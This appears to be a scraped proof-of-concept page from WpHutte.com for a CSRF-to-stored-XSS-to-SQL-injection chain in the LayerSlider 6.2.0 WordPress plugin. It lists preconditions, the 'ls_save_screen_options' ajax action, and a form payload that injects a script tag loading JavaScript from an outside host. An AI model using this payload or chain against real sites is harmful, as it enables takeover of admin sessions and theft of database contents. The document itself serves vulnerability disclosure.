LayerSlider 6.2.0 CSRF -> Sored XSS -> SQL Injection

by WpHutte.com

Notes:

You need to be logged with Admin privileges on the target URL, and
to have at least 1 slider for this to work.

Also you might want to allow popups.

Tested on WordPress 4.7.3

Settings:

Target URL:
* Note, /wp-admin/admin-ajax.php gets appended automatically if needed


Output log

None ? means not found in the charset, _ means AJAX error.

The Form

action :ls_save_screen_options
options[numberOfSliders] : 11"> <script src=http://cdn.wphutte.com/Utils/alert.js></script>

Iframe for POST result


POC by WPHutte.com